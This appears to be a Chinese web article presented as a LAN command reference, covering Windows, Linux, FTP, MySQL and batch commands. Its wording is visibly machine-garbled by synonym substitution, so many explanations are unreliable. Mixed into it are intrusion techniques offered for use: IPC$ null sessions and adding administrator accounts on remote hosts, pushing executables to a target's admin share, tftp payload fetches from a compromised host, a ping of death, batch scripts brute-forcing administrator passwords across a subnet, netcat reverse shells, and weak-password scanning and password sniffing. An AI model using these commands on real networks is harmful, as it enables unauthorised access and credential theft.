当前位置：首页 -> 网络安全 -> 基础知识 -> 局域网内命令大全

局域网内命令大全

时间： 2021-07-31 作者：daque

net view 不妨看到局域网内的一切的呆板，而后在ping一下就领会了，大概这个方法比拟笨，但很有效的。

局域网dos吩咐集

net use \\ip\ipc$ " " /user:" " 创造ipc空链接

net use \\ip\ipc$ "暗号" /user:"用户名" 创造ipc非空链接

net use h: \\ip\c$ "暗号" /user:"用户名" 径直登岸后映照对方c：到当地为h:

net use h: \\ip\c$ 登岸后映照对方c：到当地为h:

net use \\ip\ipc$ /del 简略ipc链接

net use h: /del 简略映照对方到当地的为h:的映照

net user 用户名暗号/add 创造用户

net user g

st /active:yes 激活g

st用户

net user 察看有哪些用户

net user 帐户名察看帐户的属性

net localgroup ***istrators 用户名/add 把“用户”增添到处置员中使其具备处置员权力,提防：***istrator后加s用复数

net start 察看打开了哪些效劳

net start 效劳名打开效劳；(如:net start telnet，net start schedule)

net stop 效劳名遏止某效劳

net time \\目的ip 察看对方功夫

net time \\目的ip /set 树立当地计划机功夫与“目的ip”长机的功夫同步,加上参数/yes可废除确认消息

net view 察看当地局域网内打开了哪些共享

net view \\ip 察看对方局域网内打开了哪些共享

net config 表露体例搜集树立

net logoff 割断贯穿的共享

net pause 效劳名休憩某效劳

net send ip "文本消息" 向对方发消息

net ver 局域网内正在运用的搜集贯穿典型和消息

net share 察看当地打开的共享

net share ipc$ 打开ipc$共享

net share ipc$ /del 简略ipc$共享

net share c$ /del 简略c：共享

net user g

st 12345 用g

st用户登岸后用将暗号改为12345

net password 暗号变动体例登岸暗号

netstat -a 察看打开了哪些端口,常用netstat -an

netstat -n 察看端口的搜集贯穿情景，常用netstat -an

netstat -v 察看正在举行的处事

netstat -p 和议名例：netstat -p tcq/ip 察看某和议运用情景（察看tcp/ip和议运用情景）

netstat -s 察看正在运用的一切和议运用情景

nbtstat -a ip 对方136到139个中一个端口开了的话，就可察看对方迩来登岸的用户名（03前的为用户名）-提防：参数-a要小写

tracert -参数ip(或计划机名) 盯梢路由（数据包），参数：“-w数字”用来树立超功夫隔。

ping ip(或域名) 向对方长机发送默许巨细为32字节的数据，参数：“-l[空格]数据包巨细”；“-n发送数据度数”；“-t”指从来ping。

ping -t -l 65550 ip 牺牲之ping(发送大于64k的文献并从来ping就成了牺牲之ping)

ipconfig (winipcfg) 用来windows nt及xp(windows 95 98)察看当地ip地方，ipconfig可用参数“/all”表露十足摆设消息

tlist -t 以树队伍表表露过程(为体例的附加东西，默许是没有安置的，在安置目次的support/tools文献夹内)

kill -f 过程名加-f参数后强迫中断某过程(为体例的附加东西，默许是没有安置的，在安置目次的support/tools文献夹内)

del -f 文献名加-f参数后就可简略只读文献,/ar、/ah、/as、/aa辨别表白简略只读、湮没、体例、存档文献，/a-r、/a-h、/a-s、/a-a表白简略除只读、湮没、体例、存档除外的文献。比方“del/ar *.*”表白简略暂时目次下一切只读文献，“del/a-s *.*”表白简略暂时目次下除体例文献除外的一切文献

#2 二：

del /s /q 目次或用：rmdir /s /q 目次/s简略目次及目次下的一切子目次和文献。同声运用参数/q 可废除简略操纵时的体例确认就径直简略。（二个吩咐效率沟通）

move 盘符\路途\要挪动的文献名寄存挪动文献的路途\挪动后文献名挪动文献,用参数/y将废除确认挪动目次生存沟通文献的提醒就径直掩盖

fc one.txt two.txt > 3st.txt 比较二个文献并把各别之处输入到3st.txt文献中，"> "和"> >" 是重定向吩咐

at id号打开已备案的某个安置工作

at /delete 遏止一切安置工作，用参数/yes则不须要确认就径直遏止

at id号/delete 遏止某个已备案的安置工作

at 察看一切的安置工作

at \\ip time 步调名(或一个吩咐) /r 在某功夫运转对方某步调并从新启用计划机

finger username @host 察看迩来有哪些用户登岸

telnet ip 端口远和登岸效劳器,默许端口为23

open ip 贯穿到ip（属telnet登岸后的吩咐）

telnet 在本机上径直键入telnet 将加入本机的telnet

copy 路途\文献名1 路途\文献名2 /y 复制文献1到指定的目次为文献2，用参数/y就同声废除确认你要改写一份现存目次文献

copy c:\srv.exe \\ip\***$ 复制当地c:\srv.exe到对方的***下

cppy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的实质安身到1st.jpg中天生3st.jpg新的文献，注：2st.txt文献头要空三排，参数：/b指二进制文献，/a指ascll方法文献

copy \\ip\***$\svv.exe c:\ 或:copy\\ip\***$\*.* 复制对方***i$共享下的srv.exe文献（一切文献）至当地c：

xcopy 要复制的文献或目次树目的地方\目次名复制文献和目次树，用参数/y将不提醒掩盖沟通文献

tftp -i 本人ip(用肉机作跳板时这用肉机ip) get server.exe c:\server.exe 登岸后，将“ip”的server.exe载入到目的长机c:\server.exe 参数：-i指以二进制形式传递，如传递exe文献时用，如不加-i 则以ascii形式（传递文本文献形式）举行传递

tftp -i 对方ip put c:\server.exe 登岸后，上传当地c:\server.exe至长机

ftp ip 端口用来上传文献至效劳器或举行文献操纵，默许端口为21。bin指用二进制办法传递（可实行文献进）；默许为ascii方法传递(文本文献时)

route print 表露出ip路由，将重要表露搜集地方network addres，子网掩码netmask，网关地方gateway addres，接口地方interface

arp 察看和处置arp缓存，arp是名字领会的道理，控制把一个ip领会成一个物理性的mac地方。arp -a将表露出十足消息

start 步调名或吩咐/max 或/min 新开一个新窗口并最大化（最小化）运转某步调或吩咐

mem 察看cpu运用情景

attrib 文献名(目次名) 察看某文献（目次）的属性

attrib 文献名-a -r -s -h 或+a +r +s +h 去掉(增添)某文献的存档，只读，体例，湮没属性；用＋则是增添为某属性

dir 察看文献，参数：/q表露文献及目次属体例哪个用户，/t:c表露文献创造功夫，/t:a表露文献上回被考察功夫，/t:w上回被窜改功夫

date /t 、time /t 运用此参数即“date/t”、“time/t”将只表露暂时日子和功夫，而不用输出新日子和功夫

set 指定情况变量称呼=要指使给变量的字符树立情况变量

set 表露暂时一切的情况变量

set p(或其它字符) 表露出暂时以字符p(或其它字符)发端的一切情况变量

pause 休憩批处置步调，并表露出：请按大肆键连接....

if 在批处置步调中实行前提处置（更多证明见if吩咐及变量）

goto 标签将cmd.exe导向到批处置步调中带标签的行（标签必需独立一条龙，且以冒号打头，比方：“：start”标签）

call 路途\批处置文献名从批处置步调中挪用另一个批处置步调（更多证明见call /?）

for 对一组文献中的每一个文献实行某个一定吩咐（更多证明见for吩咐及变量）

echo on或off 翻开或封闭echo，仅用echo不加参数则表露暂时echo树立

echo 消息在屏幕上表露出消息

echo 消息>> pass.txt 将"消息"生存到pass.txt文献中

findstr "hello" aa.txt 在aa.txt文献中探求字符串hello

find 文献名搜索某文献

title 标提名字变动cmd窗口标提名字

color 脸色值树立cmd遏制台远景和后台脸色；0＝黑、1＝蓝、2＝绿、3＝浅绿、4＝红、5＝紫、6＝黄、7=白、8=灰、9=葱白、a＝淡绿、b=淡浅绿、c=浅红、d=淡紫、e=牙色、f=亮白

prompt 称呼变动cmd.exe的表露的吩咐提醒符(把c:\、d:\一致改为：entsky\ )

#3 三：

ver 在dos窗口下表露本子消息

winver 弹出一个窗口表露本子消息（外存巨细、体例本子、补丁本子、计划机名）

format 盘符/fs:典型方法化磁盘,典型:fat、fat32、ntfs ,例：format d: /fs:ntfs

md 目次名创造目次

replace 源文献要替代文献的目次替代文献

ren 原文献名新文献名重定名文献名

tree 以树形构造表露出目次，用参数-f 将列出第个文献夹中文献称呼

type 文献名表露文本文献的实质

more 文献名逐屏表露输入文献

doskey 要锁定的吩咐＝字符

doskey 要解锁吩咐= 为dos供给的锁定吩咐(编纂吩咐行，从新挪用win2k吩咐，并创造宏)。如：锁定dir吩咐：doskey dir=entsky (不许用doskey dir=dir)；解锁：doskey dir=

taskmgr 调出工作处置器

chkdsk /f d: 查看磁盘d并表露状况汇报；加参数/f并建设磁盘上的缺点

tlntadmn telnt效劳admn,键入tlntadmn采用3，再采用8,就不妨变动telnet效劳默许端口23为其它任何端口

exit 退出cmd.exe步调或暂时，用参数/b则是退出暂时批处置剧本而不是cmd.exe

path 路途\可实行文献的文献名为可实行文献树立一个路途。

cmd 启用一个win2k吩咐证明窗口。参数：/eff、/en 封闭、打开吩咐扩充；更我精细证明见cmd /?

regedit /s 备案表文献名导出备案表；参数/s指宁静形式导出，无任何提醒；

regedit /e 备案表文献名导出备案表

cacls 文献名参数表露或窜改文献考察遏制列表（acl）——对准ntfs方法时。参数：/d 用户名:设定中断某用户考察；/p 用户名:perm 替代指定用户的考察权力；/g 用户名:perm 付与指定用户考察权力；perm 不妨是: n 无，r 读取，w 写入，c 变动(写入)，f 实足遏制；例：cacls d:\test.txt /d p 设定d:\test.txt中断p 用户考察。

cacls 文献名察看文献的考察用户权力列表

rem 文本实质在批处置文献中增添证明

netsh 察看或变动当地搜集摆设情景

#4 四：

iis效劳吩咐：

iisreset /reboot 重启win2k计划机（但有提醒体例将重启消息展示）

iisreset /start或stop 启用（遏止）一切internet效劳

iisreset /restart 遏止而后从新启用一切internet效劳

iisreset /status 表露一切internet效劳状况

iisreset /enable或disable 在当地体例上起用（禁止使用）internet效劳的从新启用

iisreset /rebootonerror 当启用、遏止或从新启用internet效劳时，若爆发缺点将从新开机

iisreset /noforce 若没辙遏止internet效劳，将不会强迫中断internet效劳

iisreset /timeout val在达到逾功夫（秒）时，仍未遏止internet效劳，若指定/rebootonerror参数，则电脑将会从新开机。预设值为从新启用20秒，遏止60秒，从新开机0秒。

ftp 吩咐：(反面有精细证明实质)

ftp的吩咐行方法为:

ftp －v －d －i －n －g[长机名] －v 表露长途效劳器的一切相应消息。

－d 运用调节和测试办法。

－n 控制ftp的机动登录,即不运用.netrc文献。

－g 废除全部文献名。

help [吩咐] 或？[吩咐] 察看吩咐证明

bye 或quit 中断长机ftp过程,并退出ftp处置办法.

pwd 列出暂时远端长机目次

put 或send 当地文献名[上传到长机上的文献名] 将当地一个文献传递至远端长机中

get 或recv [长途长机文献名] [载入到当地后的文献名] 从远端长机中传递至当地长机中

mget [remote-files] 从远端长机接受一批文献至当地长机

mput local-files 将当地长机中一批文献传递至远端长机

dir 或ls [remote-directory] [local-file] 列出暂时远端长机目次中的文献.即使有当地文献,就将截止写至当地文献

ascii 设定以ascii办法传递文献(缺省值)

bin 或image 设定以二进制办法传递文献

bell 每实行一次文献传递,报告警方提醒

cdup 归来上头等目次

close 阻碍与长途效劳器的ftp对话(与open对应)

open host[port] 创造指定ftp效劳器贯穿,可指定贯穿端口

delete 简略远端长机中的文献

mdelete [remote-files] 简略一批文献

mkdir directory-name 在远端长机中创造目次

rename [from] [to] 变换远端长机中的文献名

rmdir directory-name 简略远端长机中的目次

status 表露暂时ftp的状况

system 表露远端长机体例典型

user user-name [password] [account] 从新以其余用户名登录远端长机

open host [port] 从新创造一个新的贯穿

prompt 交互提醒形式

macdef 设置宏吩咐

lcd 变换暂时当地长机的处事目次,即使缺省,就转到暂时用户的home目次

chmod 变换远端长机的文献权力

case 当为on时,用mget吩咐正片的文献名到当地呆板中,十足变换为小写假名

cd remote－dir 加入长途长机目次

cdup 加入长途长机目次的父目次

! 在当地机中实行交互shell，exit回到ftp情况,如!ls＊.zip

#5 五：

mysql 吩咐：

mysql -h长机地方-u用户名－p暗号贯穿mysql;即使刚安置好mysql，超等用户root是没有暗号的。

（例：mysql -h110.110.110.110 -uroot -p123456

注:u与root不妨不必加空格，其它也一律）

exit 退出mysql

mysql*** -u用户名-p旧暗号password 新暗号窜改暗号

grant select on 数据库.* to 用户名@登录长机identified by \"暗号\"; 减少新用户。（提防：和上头各别，底下的由于是mysql情况中的吩咐，以是反面都带一个分号动作吩咐中断符）

show databases; 表露数据库列表。刚发端时才两个数据库：mysql和test。mysql库很要害它内里有mysql的体例消息，咱们改暗号和新增用户，本质上即是用这个库举行操纵。

use mysql；

show tables; 表露库中的数据表

describe 表名; 表露数据表的构造

create database 库名; 建库

use 库名；

create table 表名(字段设定列表)；建表

drop database 库名;

drop table 表名；删库和删表

delete from 表名; 将表中记载清空

select * from 表名; 表露表中的记载

mysqldump --opt school>school.bbb 备份数据库：（吩咐在dos的\\mysql\\bin目次下实行）;解释:将数据库school备份到school.bbb文献，school.bbb是一个文本文献，文献名任取，翻开看看你会有新创造。

win2003体例下新增吩咐（适用部份）：

shutdown /参数封闭或重启当地或长途长机。

参数证明：/s 封闭长机，/r 重启长机，/t 数字设定延时的功夫，范畴0～180秒之间，/a废除开机，/m //ip 指定的长途长机。

例：shutdown /r /t 0 登时重启当地长机（无延时）

taskill /参数过程名或过程的pid 中断一个或多个工作和过程。

参数证明：/pid 要中断过程的pid,可用tasklist吩咐赢得各过程的pid，/im 要中断的过程的过程名，/f 强迫中断过程，/t 中断指定的过程及他所启用的子过程。

tasklist 表露暂时运转在当地和长途长机上的过程、效劳、效劳各过程的过程操作符(pid)。

参数证明：/m 列出当进步程加载的dll文献，/svc 表露出每个过程对应的效劳，无参数时就只列出暂时的过程。

#6 六：linux体例下基础吩咐：要辨别巨细写

uname 表露本子消息（同win2k的ver）

dir 表露暂时目次文献,ls -al 表露囊括湮没文献（同win2k的dir）

pwd 查问暂时地方的目次场所

cd cd ..回到上一层目次，提防cd 与..之间有空格。cd /归来到根目次。

cat 文献名察看文献实质

cat >abc.txt 往abc.txt文献中写上实质。

more 文献名以一页一页的办法表露一个文本文献。

cp 复制文献

mv 挪动文献

rm 文献名简略文献，rm -a 目次名简略目次及子目次

mkdir 目次名创造目次

rmdir 简略子目次，目次内没有文书档案。

chmod 设定档案或目次的存取权力

grep 在档案中搜索字符串

diff 档案文献比拟

find 档案搜罗

date 此刻的日子、功夫

who 查问暂时和你运用同一台呆板的人以及login功夫场所

w 查问暂时上机者的精细材料

whoami 察看本人的帐号称呼

groups 察看或人的group

passwd 变动暗号

history 察看本人下过的吩咐

ps 表露过程状况

kill 遏止某过程

gcc 黑客常常用它来编写翻译c谈话写的文献

su 权力变换为指定运用者

telnet ip telnet贯穿对方长机（同win2k），当展示bash$时就证明贯穿胜利。

ftp ftp贯穿上某效劳器（同win2k）

附：批处置吩咐与变量

1：for吩咐及变量基础方法：

for /参数%variable in (set) do command [command_parameters] %variable:指定一个简单假名可替代的参数，如：%i ，而指定一个变量则用：%%i ，而挪用变量时用：%i% ，变量是辨别巨细写的（%i 不即是%i）。

批处置历次能处置的变量从%0—%9共10个，个中%0默许给批处置文献名运用，%1默许为运用此批处置时输出的的第一个值，同理：%2—%9指输出的第2-9个值；例：net use \\ip\ipc$ pass /user:user 中ip为%1,pass为%2 ,user为%3

(set):指定一个或一组文献，可运用通配符，如：(d:\user.txt)和(1 1 254)(1 -1 254),{ “(1 1 254)”第一个"1"指开始值，第二个"1"指延长量，第三个"254"指中断值，即：从1到254；“(1 -1 254)”证明：即从254到1 }

command：指定对第个文献实行的吩咐，如：net use吩咐；如要实行多个吩咐时，吩咐这间加：& 来隔绝

command_parameters：为一定吩咐指定参数或吩咐行电门

in (set)：指在(set)中取值；do command ：指实行command

参数：/l 指用增量情势{ (set)为增量情势时}；/f 指从文献中连接取值，直到取完为止{ (set)为文献时，如(d:\pass.txt)时}。

用法举例：

@echo off

echo 用法方法：test.bat *.*.* > test.txt

for /l %%g in (1 1 254) do echo %1.%%g >>test.txt & net use \\%1.%%g /user:***istrator | find "吩咐胜利实行" >>test.txt

存为test.bat 证明：对指定的一个c类网段的254个ip顺序试创造***istrator暗号为空的ipc$贯穿，即使胜利就把该ip生存test.txt中。

/l指用增量情势（即从1-254或254-1）；输出的ip前方三位：*.*.*为批处置默许的%1；%%g 为变量(ip的结果一位）；& 用来隔绝echo 和net use 这二个吩咐；| 指创造了ipc$后，在截止顶用find察看能否有"吩咐胜利实行"消息；%1.%%g 为完备的ip地方；(1 1 254) 指开始值，延长量，结止值。

@echo off

echo 用法方法：ok.bat ip

for /f %%i in (d:\user.dic) do smb.exe %1 %%i d:\pass.dic 200

存为：ok.exe 证明：输出一个ip后，用字典文献d:\pass.dic来暴解d:\user.dic中的用户暗号，直到文献中值取完为止。%%i为用户名；%1为输出的ip地方（默许）。

#7 七：

2：if吩咐及变量基础方法：

if [not] errorlevel 数字吩咐语句即使步调运转结果归来一个即是或大于指定命字的退出源代码，指定前提为“真”。

例：if errorlevel 0 吩咐指步调实行后归来的值为0时，就值行反面的吩咐；if not errorlevel 1 吩咐指步调实行结果归来的值不即是1，就实行反面的吩咐。

0 指创造并胜利实行（真）；1 指没有创造、没实行（假）。

if [not] 字符串1==字符串2 吩咐语句即使指定的文古字符串配合（即：字符串1 即是字符串2），就实行反面的吩咐。

例：“if "%2%"=="4" goto start”指：即使输出的第二个变量为4时，实行反面的吩咐（提防：挪用变量时就%变量名%并加" "）

if [not] exist 文献名吩咐语句即使指定的文献名生存，就实行反面的吩咐。

例：“if not nc.exe goto end”指：即使没有创造nc.exe文献就跳到":end"标签处。

if [not] errorlevel 数字吩咐语句else 吩咐语句或if [not] 字符串1==字符串2 吩咐语句else 吩咐语句或if [not] exist 文献名吩咐语句else 吩咐语句加上：else 吩咐语句后指：当前方的前提不可登时，就指行else反面的吩咐。提防：else 必需与if 在同一条龙才灵验。当有del吩咐时需把del吩咐十足实质用< >括起来，由于del吩咐要独立一条龙时本领实行，用上< >后就等所以独立一条龙了；比方：“if exist test.txt. <del test.txt.> else echo test.txt.missing ”，提防吩咐中的“.”

（二）体例外部吩咐(均需载入关系东西)：

1、瑞士马刀：nc.exe

参数证明：

-h 察看扶助消息

-d 后盾形式

-e prog步调重定向，一但贯穿就实行〔伤害〕

-i secs延时的间隙

-l 监听形式，用来入站贯穿

-l 监听形式，贯穿天闭后仍旧连接监听，直到ctr+c

-n ip地方，不许用域名

-o film记载16进制的传输

-p[空格]端口当地端标语

-r 随机当地及长途端口

-t 运用telnet交互办法

-u p形式

-v 精细输入，用-vv将更精细

-w数字timeout延功夫隔

-z 将输出，输入关掉（用来扫锚时）

基础用法：

nc -nvv 192.168.0.1 80 贯穿到192.168.0.1长机的80端口

nc -l -p 80 打开本机的tcp 80端口并监听

nc -nvv -w2 -z 192.168.0.1 80-1024 扫锚192.168.0.1的80-1024端口

nc -l -p 5354 -t -e c:winntsystem32cmd.exe 绑定remote长机的cmdshell在remote的tcp 5354端口

nc -t -e c:winntsystem32cmd.exe 192.168.0.2 5354 梆定remote长机的cmdshell并反向贯穿192.168.0.2的5354端口

高档用法：

nc -l -p 80 动作蜜罐用1：打开并不停地监听80端口，直到ctr+c为止

nc -l -p 80 > c:\log.txt 动作蜜罐用2：打开并不停地监听80端口，直到ctr+c,同声把截止输入到c:\log.txt

nc -l -p 80 < c:\honeyport.txt 动作蜜罐用3-1：打开并不停地监听80端口，直到ctr+c,并把c:\honeyport.txt中实质送入弹道中，亦可起到传递文献效率

type.exe c:\honeyport | nc -l -p 80 动作蜜罐用3-2：打开并不停地监听80端口，直到ctr+c,并把c:\honeyport.txt中实质送入弹道中,亦可起到传递文献效率

本机上用：nc -l -p 本机端口

在对方长机上用：nc -e cmd.exe 本机ip -p 本机端口*win2k

nc -e /bin/sh 本机ip -p 本机端口*linux,unix 反向贯穿冲破对方长机的风火墙

本机上用：nc -d -l -p 本机端口< 要传递的文献路途及称呼

在对方长机上用：nc -vv 本机ip 本机端口> 寄存文献的路途及称呼传递文献到对方长机

备注：

| 弹道吩咐

< 或> 重定向吩咐。“<”，比方：tlntadmn < test.txt 指把test.txt的实质赋值给tlntadmn吩咐

＠表白实行＠反面的吩咐，但不会表露出来（后盾实行）；例：＠dir c:\winnt >> d:\log.txt 道理是：后盾实行dir，并把截止生存d:\log.txt中

>与>>的辨别">"指：掩盖；">>"指：生存到(增添到）。

如：@dir c:\winnt >> d:\log.txt和@dir c:\winnt > d:\log.txt二个吩咐辨别实行二次比拟看：用>>的则是把二次的截止都生存了，而用：>则惟有一次的截止，是由于第二次的截止把第一次的掩盖了。

#8 八：

2、扫锚东西：xscan.exe

基础方法

xscan -host <开始ip>[-<中断ip>] <检验和测定名目> [其余选项] 扫锚"开始ip到中断ip"段的一切长机消息

xscan -file <长机列表文献名> <检验和测定名目> [其余选项] 扫锚"长机ip列表文献名"中的一切长机消息

检验和测定名目

-active 检验和测定长机能否存活

-os 检验和测定长途操纵体例典型（经过netbios和snmp和议）

-port 检验和测定常用效劳的端口状况

-ftp 检验和测定ftp弱口令

-p 检验和测定ftp效劳隐姓埋名用户写权力

-pop3 检验和测定pop3-server弱口令

-smtp 检验和测定smtp-server缺点

-sql 检验和测定sql-server弱口令

-smb 检验和测定nt-server弱口令

-iis 检验和测定iis源代码/解码缺点

-cgi 检验和测定cgi缺点

-nasl 加载nessus报复剧本

-all 检验和测定之上一切名目

其它选项

-i 适配重编号树立搜集适配重, <适配重编号>可经过"-l"参数获得

-l 表露一切搜集适配重

-v 表露精细扫描进度

-p 跳过没有相应的长机

-o 跳过没有检验和测定到盛开端口的长机

-t 并发线程数目,并发长机数目指定最大并发线程数目和并发长机数目, 默许数目为100,10

-log 文献名指定扫描汇报文献名(后缀为：txt或html方法的文献)

用法示例

xscan -host 192.168.1.1-192.168.255.255 -all -active -p 检验和测定192.168.1.1-192.168.255.255网段内长机的一切缺点，跳过无相应的长机

xscan -host 192.168.1.1-192.168.255.255 -port -smb -t 150 -o 检验和测定192.168.1.1-192.168.255.255网段内长机的规范端口状况，nt弱口令用户，最大并发线程数目为150，跳过没有检验和测定到盛开端口的长机

xscan -file hostlist.txt -port -cgi -t 200,5 -v -o 检验和测定“hostlist.txt”文献中列出的一切长机的规范端口状况，cgi缺点，最大并发线程数目为200，同一功夫最多检验和测定5台长机，表露精细检验和测定进度，跳过没有检验和测定到盛开端口的长机

#9 九：

3、吩咐行办法嗅探器: xsniff.exe

可捕捉局域网内ftp/smtp/pop3/http和议暗号

参数证明

-tcp 输入tcp数据报

- p 输入p数据报

-icmp 输入icmp数据报

-pass 过滤暗号消息

-hide 后盾运转

-host 领会长机名

-addr ip地方过滤ip地方

-port 端口过滤端口